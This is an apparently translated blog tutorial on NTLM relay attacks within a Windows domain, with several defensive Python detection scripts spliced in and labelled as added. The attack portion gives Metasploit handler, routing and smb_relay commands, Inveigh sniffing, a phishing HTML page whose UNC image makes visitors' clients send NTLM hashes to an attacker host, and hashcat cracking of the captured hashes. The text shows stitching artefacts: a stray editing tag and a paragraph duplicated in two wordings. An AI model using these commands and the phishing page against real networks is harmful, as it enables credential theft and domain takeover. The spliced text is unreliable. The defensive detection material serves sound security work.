Intranet lateral movement - NTLM-Relay replay & Responder relay attack & Ldap & Ews

1. Pre-understanding

  Security issues around NTLM authentication mainly include Pass The Hash, information collection via NTLM, Net-NTLM hash cracking, and NTLM relay. PTH was reproduced in the previous article; it can be done with mimikatz, some scripts from the impacket toolkit, CS, and so on. NTLM relay (to SMB, LDAP, or EWS) can be used when neither the plaintext password nor the hash can be obtained, but pay attention to the preconditions of the technique.

1.1. Switch permissions between MSF and CS

  When a host comes online in CS or MSF normally, the session usually belongs to an ordinary user, and the goal is to escalate to SYSTEM. Sometimes, however, we need to act as administrator, and there is no session with that identity to connect to, so this section introduces how to switch. Note that a low-privilege session cannot be switched to a high-privilege one, but a high-privilege session can be switched to a low-privilege one: a SYSTEM session can be switched to administrator, but a webadmin session cannot be switched to administrator. This is something to be aware of.

  To put it simply, we first need to obtain the highest privilege and then drop to the lower one.

1.1.1. Switch permissions in a CS session

  First, use the high-privilege CS session to list the processes, observe which ones are running with administrator privileges, record the PID of such a process, and then switch to it using that PID.

1.1.1.1. View process

  Here I show it up front: my current privilege is SYSTEM. I then use ps to check which processes are running as administrator; here I see PID 2336.

ps  ## list running processes


1.1.1.2. Switch permissions

  Here you can see that I successfully switched privileges.

steal_token 2336   ## switch privileges; 2336 is the PID


1.1.2. Switch permission in MSF session

  I won't repeat the procedure here, since it is the same: list the processes, record the PID, and switch. Only the switch command differs slightly.

migrate 1992   # 1992 is the PID

</gr_replreplace>
<gr_replace lines="44" cat="clarify" orig="When using">
  Relay replay requires a precondition: the two parties that need to communicate must have the same account and password. For example, the Windows Server 2012 DC has administrator/admin@123; the Windows Server 2008 host in the domain is logged in as 0day/webadmin, but if its administrator account and password are the same as the DC's, access succeeds, because by default the current account's password is used to authenticate against the other party's account of the same name.

2. NTLM relay attack—Relay replay—SMB online

  When using Relay to replay, there needs to be a precondition. This condition is that the accounts and passwords of the two parties that need to communicate are the same. For example: Windows server 2012 DC has administrator/admin@123, and at the same time, although the host in the Windows server 2008 domain logs in It is 0day/webadmin, but if the administrator account and password are the same as the DC, then you can access, because the default is to use the current account password to verify with the other party's account password when accessing.

2.1. Case test

  Here we test against the DC; the case configuration is as follows:

Domain controller DC: 192.168.3.142  administrator/admin@123
Host in the domain:   192.168.3.10   administrator/admin@123
                                     webadmin/admin@123

  As can be seen above, the passwords are the same and only the accounts differ, so let's test whether the statement above holds.

2.1.1. Same account password test

  I switched the host in the domain to administrator for the test. Under this condition the domain controller DC and the domain host have the same account and password, and you can see that access succeeds directly without any error.


2.1.2. Different accounts with the same password test

  I switched the host in the domain to webadmin for the test. Now the accounts differ but the passwords are the same, and you can see that access is denied outright. Strictly speaking, the error here should be a wrong account or password; the "access denied" shown is presumably a permission-setting issue on the domain controller.


2.2. CS linkage MSF test

  First bring the host in the domain online in CS. Since CS has no corresponding function, it has to be chained with MSF for the test, and the forwarded session must be escalated to SYSTEM before execution.

  I won't go into the details of bringing the host online in CS here.

2.2.1. CS forwarding MSF online

  The previous article already covered forwarding a CS session to MSF, so I won't repeat it here; just look at the operation directly.

2.2.1.1. Case Operation

  Note that the MSF handler must be running first, and only then do you operate in CS; otherwise the listener easily fails to catch the session.

CS: create a new session and choose the MSF listener; the command spawn msf also works
MSF: set up the listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 3010
run


2.2.1.2. Add route

  Since the domain controller is on the internal network, a corresponding route must be added to the session so that MSF can reach the host in the domain.

run autoroute -p   ## show the current routing table
run post/multi/manage/autoroute   ## add a route through the current session
background   ## return to the console


2.2.2. Replay module attack

  Here the SMB relay module is used for the attack. The operations below are easier to follow together with the screenshot. The same precondition applies: the account and password must be identical for it to succeed; if they differ it cannot be exploited.


2.2.2.1. Module Settings

  I'll say up front that this was not successful: only the hash was returned and no session was established. Looking around, I found that many articles online also report failure; some say it fails on 64-bit systems but succeeds on 32-bit. I don't want to switch to a 32-bit system to test, and if it only works on 32-bit it is really of little use. Another possibility is that my msf is fully up to date and a small bug in the msf module is responsible.

use exploit/windows/smb/smb_relay
set smbhost 192.168.3.142   # attack target
set lhost 192.168.10.20   # local IP
set autorunscript post/windows/manage/migrate
set payload windows/meterpreter/bind_tcp  ## bind (forward) connection
set rhost 192.168.3.142 # connection target
run


2.2.2.2. Access Settings

  Here the controlled host must access the attacking host's address. Simply put, the controlled host connects to the attacker machine and sends its own account credentials (the NTLM authentication) to it; the attacker machine then uses them to access the domain controller, which is how the attacker machine relays the authentication and obtains a session.

  Also note that this must be done with administrator privileges.

dir \\192.168.10.20\c$

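From the defender's side, the relay described in this section leaves a characteristic trace on the server that receives it: a network logon (type 3) authenticated with NTLM whose Workstation Name field carries the victim's host name while the Source Network Address is the relay host. The following Python script, an added example that is not part of the original article, applies that heuristic to constructed Windows 4624 events using the addresses from this article; the workstation-to-IP inventory, the host name WIN2008-HOST and the DC name DC01 are assumptions, and reading real EVTX data is left out.

```python
"""Heuristic detection of NTLM relay from Windows 4624 (logon) events.

In a relay the target server receives the victim's NTLM AUTHENTICATE message,
so the Workstation Name field carries the victim's host name, while the TCP
connection (Source Network Address) comes from the attacker's relay host.
The inventory and events below are constructed for this example.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class LogonEvent:
    """Subset of the fields in a Windows security event 4624."""
    event_id: int
    logon_type: int        # 3 = network logon (SMB, LDAP, HTTP, ...)
    auth_package: str      # "NTLM" or "Kerberos"
    account: str
    workstation: str       # Workstation Name, copied from the NTLM message
    source_ip: str         # Source Network Address, the real TCP peer
    target_host: str       # host that logged the event


# Constructed asset inventory: the IP each workstation name is expected to use.
ASSET_INVENTORY: Dict[str, str] = {
    "WIN2008-HOST": "192.168.3.10",   # the domain host from the article (name assumed)
    "DC01": "192.168.3.142",          # placeholder name for the DC
}

# Constructed events. The second one is what the DC would log when the domain
# host authenticates to 192.168.10.20 and that host relays the exchange to the DC.
SAMPLE_EVENTS: List[LogonEvent] = [
    LogonEvent(4624, 3, "NTLM", "administrator", "WIN2008-HOST", "192.168.3.10", "DC01"),
    LogonEvent(4624, 3, "NTLM", "administrator", "WIN2008-HOST", "192.168.10.20", "DC01"),
    LogonEvent(4624, 3, "Kerberos", "webadmin", "WIN2008-HOST", "192.168.3.10", "DC01"),
    LogonEvent(4624, 2, "NTLM", "administrator", "DC01", "127.0.0.1", "DC01"),
]


def relay_indicator(ev: LogonEvent, inventory: Dict[str, str]) -> Optional[str]:
    """Return a reason string if the event looks like a relayed NTLM logon."""
    if ev.event_id != 4624 or ev.logon_type != 3:
        return None                      # only network logons matter
    if ev.auth_package.upper() != "NTLM":
        return None                      # Kerberos tickets are not relayed this way
    expected = inventory.get(ev.workstation.upper())
    if expected is None:
        return f"NTLM logon from unknown workstation {ev.workstation!r} at {ev.source_ip}"
    if expected != ev.source_ip:
        return (f"workstation {ev.workstation} is inventoried at {expected}, but the NTLM "
                f"logon as {ev.account} to {ev.target_host} came from {ev.source_ip}")
    return None


def find_relay_candidates(events: List[LogonEvent],
                          inventory: Dict[str, str] = ASSET_INVENTORY) -> List[Tuple[str, str]]:
    """Return (source_ip, reason) pairs for every suspicious event."""
    findings = []
    for ev in events:
        reason = relay_indicator(ev, inventory)
        if reason:
            findings.append((ev.source_ip, reason))
    return findings


if __name__ == "__main__":
    for ip, reason in find_relay_candidates(SAMPLE_EVENTS):
        print(f"[relay candidate] {ip}: {reason}")
```

The Workstation Name field is supplied by the client and can be empty or arbitrary, so treat a hit as a triage signal rather than proof. Requiring SMB signing on the target (and LDAP signing or channel binding for LDAP relays) removes the relay path itself, independent of whether the credentials are shared.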

3. NTLM relay attack-Inveigh sniffing-Hash cracking

  In this attack the attacker runs a forged SMB server on the controlled host. When a machine on the intranet accesses the controlled host over SMB, it reaches the attacker's forged SMB server first, and that server then forwards the traffic on to the controlled host. The intranet host notices nothing during this process, but the hashes of the accounts used by the intranet host are all captured by the forged SMB server. The procedure has two parts:

  Inveigh sniffing

  Hash cracking

  Because my virtual machine does not have .NET 3.5 or newer and for some reason it cannot be installed, which is quite troublesome, I borrowed someone else's screenshots and added commentary. The operation is very simple and not complicated, so I didn't bother to reproduce it.

3.1. Enable monitoring

  It is not recommended to run this listener locally, which is prone to problems. Since the tool is not large, it can be uploaded to the controlled server; if it gets flagged by antivirus in a real engagement, then listening locally is the only option.

  Note that once the listener is enabled, hosts on the intranet still have to access this host for anything to be captured. For example, if the host running the listener is a domain controller, but the hosts in your domain never access the domain controller over SMB, nothing will be captured.

Inveigh.exe


3.2. Start interception

  The same applies here: a host in the domain must access the monitored host, otherwise nothing is captured.

dir \\192.168.3.x\c$


3.3. Phishing pages

  There may be a problem here: users normally don't access the domain controller host, and nobody idly runs dir against it. Domain users are office staff who don't perform such operations, so you need to set up a phishing page, either hosted on an internal web site or sent directly to hosts in the domain.

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>
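The page above works because an img element with a file:// UNC source makes a Windows client open an SMB connection to the named host and authenticate with NTLM. As an added defensive example, not part of the original post, the Python scanner below flags that pattern in HTML (mail bodies, uploaded pages) while ignoring ordinary http(s), protocol-relative URLs and local-drive file: URLs. The sample documents are constructed and reuse the page above; the host names in them are placeholders.

```python
"""Flag HTML resources that point at UNC paths (file://\\host\share or \\host\share).

A browser or mail client that auto-fetches such a resource will try to reach the
named host over SMB and send NTLM authentication, which is what the phishing
page above relies on. Sample HTML below is constructed for this example.
"""
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# Attributes that make the client fetch a resource (src-like ones automatically,
# href on click or, for <link>, at load time).
AUTO_FETCH_ATTRS = {"src", "href", "background", "data", "poster", "action"}
_DRIVE = re.compile(r"^[A-Za-z]:$")


def unc_host(value: str) -> Optional[str]:
    """Return the host named by a UNC-style reference, or None.

    Recognised: 'file:' URLs with any number of slashes, and bare '\\\\host\\share'
    paths. Plain http(s) and protocol-relative '//host/' URLs are not flagged,
    nor are file: URLs for a local drive such as file:///C:/x.png.
    """
    v = value.strip()
    if v.lower().startswith("file:"):
        rest = v[5:]
    elif v.startswith("\\\\"):
        rest = v
    else:
        return None
    rest = rest.lstrip("\\/")
    host = re.split(r"[\\/]", rest, maxsplit=1)[0]
    if not host or _DRIVE.match(host):
        return None
    return host


class UncRefScanner(HTMLParser):
    """Collect (tag, attribute, host, raw value) for every UNC reference."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Tuple[str, str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None or name.lower() not in AUTO_FETCH_ATTRS:
                continue
            host = unc_host(value)
            if host:
                self.findings.append((tag, name.lower(), host, value))


def find_unc_references(html: str) -> List[Tuple[str, str, str, str]]:
    """Parse the document and return every UNC-style resource reference found."""
    scanner = UncRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: the phishing page from the article plus benign references.
SAMPLE_HTML = r"""<!DOCTYPE html>
<html><body>
  <img src="file:///\\192.168.3.32\2">
  <img src="//cdn.example.test/logo.png">
  <a href="https://intranet.example.test/">portal</a>
  <img src="file:///C:/Users/Public/local.png">
</body></html>"""


if __name__ == "__main__":
    for tag, attr, host, raw in find_unc_references(SAMPLE_HTML):
        print(f"<{tag} {attr}> forces SMB/NTLM authentication to {host}: {raw}")
```

A hit on an address outside the organisation's own file servers is a strong indicator; blocking outbound SMB (TCP 445) at the perimeter stops the same trick from reaching hosts on the Internet.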

3.4. Deciphering the ciphertext

  There is one problem here: if the virtual machine's configuration is insufficient, an error is reported. Cracking has to compute the hash for each candidate and then compare, so a low-spec machine may not be able to run that many threads concurrently; judging from the configuration shown, 4 cores and 4 GB of RAM are required...

hashcat -m 5600 hash1 pass2.txt  --show
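The -m 5600 line that Inveigh or Responder write (USER::DOMAIN:server_challenge:NTProofStr:blob) contains more than cracking input: the blob is the client's NTLMv2_CLIENT_CHALLENGE structure, with a timestamp from the victim's clock and the AV pairs that name the server the client believed it was authenticating to. The Python code below, an added example for incident responders and not from the original article, decodes that structure without verifying or cracking anything. The sample line is built by the helper in the block: the domain 0DAY and the IP 192.168.10.20 come from this article, while the computer name DC01, the challenges, the timestamp and the NTProofStr are constructed placeholders.

```python
"""Decode a Net-NTLMv2 capture in hashcat -m 5600 format (no cracking involved).

Line layout: USER::DOMAIN:SERVER_CHALLENGE(16 hex):NTPROOFSTR(32 hex):BLOB(hex)
The blob (NTLMv2_CLIENT_CHALLENGE, MS-NLMP 2.2.2.7) carries a FILETIME timestamp,
the client challenge and the AV pairs copied from the server's CHALLENGE message.
The sample below is constructed; DC01 and the NTProofStr are placeholders.
"""
import struct
from datetime import datetime, timedelta, timezone
from typing import Any, Dict, List, Tuple, Union

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
AV_NAMES = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
            4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags",
            7: "MsvAvTimestamp", 8: "MsvAvSingleHost", 9: "MsvAvTargetName",
            10: "MsvAvChannelBindings"}
_UTF16_IDS = {1, 2, 3, 4, 5, 9}


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime (microsecond precision)."""
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def parse_av_pairs(data: bytes, offset: int) -> Dict[str, Any]:
    """Walk the AV_PAIR list (u16 id, u16 length, value) until MsvAvEOL."""
    pairs: Dict[str, Any] = {}
    while offset + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        offset += 4
        if av_id == 0:
            break
        value = data[offset:offset + av_len]
        offset += av_len
        name = AV_NAMES.get(av_id, f"MsvAv{av_id}")
        if av_id in _UTF16_IDS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 7 and len(value) == 8:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            pairs[name] = value.hex()
    return pairs


def parse_netntlmv2(line: str) -> Dict[str, Any]:
    """Split a -m 5600 line and decode the NTLMv2 blob it carries."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("expected USER::DOMAIN:CHALLENGE:NTPROOFSTR:BLOB")
    user, _, domain, chal_hex, proof_hex, blob_hex = parts
    if len(chal_hex) != 16 or len(proof_hex) != 32:
        raise ValueError("server challenge must be 8 bytes and NTProofStr 16 bytes")
    blob = bytes.fromhex(blob_hex)
    if len(blob) < 28 or blob[:2] != b"\x01\x01":
        raise ValueError("blob is not an NTLMv2_CLIENT_CHALLENGE structure")
    timestamp = filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0])
    return {
        "user": user,
        "domain": domain,
        "server_challenge": chal_hex.lower(),
        "nt_proof_str": proof_hex.lower(),
        "timestamp": timestamp,                 # set by the client's clock
        "client_challenge": blob[16:24].hex(),
        "target_info": parse_av_pairs(blob, 28),
    }


def build_blob(timestamp: datetime, client_challenge: bytes,
               av_pairs: List[Tuple[int, Union[str, bytes]]]) -> bytes:
    """Assemble an NTLMv2 blob; used here only to construct the sample line."""
    out = b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", datetime_to_filetime(timestamp))
    out += client_challenge + b"\x00" * 4
    for av_id, value in av_pairs:
        enc = value.encode("utf-16-le") if isinstance(value, str) else value
        out += struct.pack("<HH", av_id, len(enc)) + enc
    return out + struct.pack("<HH", 0, 0) + b"\x00" * 4


# Constructed sample: the domain host authenticates to 192.168.10.20 (the relay
# host in this article), so the client-supplied target name is cifs/192.168.10.20
# while the NetBIOS names were supplied by the DC that actually answered.
SAMPLE_BLOB = build_blob(
    datetime(2023, 7, 28, 12, 0, 0, tzinfo=timezone.utc),
    bytes.fromhex("a1b2c3d4e5f60708"),
    [(1, "DC01"), (2, "0DAY"), (9, "cifs/192.168.10.20")],
)
SAMPLE_LINE = "administrator::0DAY:1122334455667788:" + "ab" * 16 + ":" + SAMPLE_BLOB.hex()


if __name__ == "__main__":
    info = parse_netntlmv2(SAMPLE_LINE)
    print(f"{info['domain']}\\{info['user']} authenticated at {info['timestamp']} (client clock)")
    for name, value in info["target_info"].items():
        print(f"  {name}: {value}")
```

Two fields are useful in triage: the timestamp comes from the victim's clock, so it dates the capture independently of the attacker's tooling, and MsvAvTargetName (added by newer Windows clients) names the service the client meant to reach. In a relay that name disagrees with the server that actually received the authentication, which is a concrete artefact to look for in captured material.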


Origin blog.csdn.net/weixin_44268918/article/details/132003810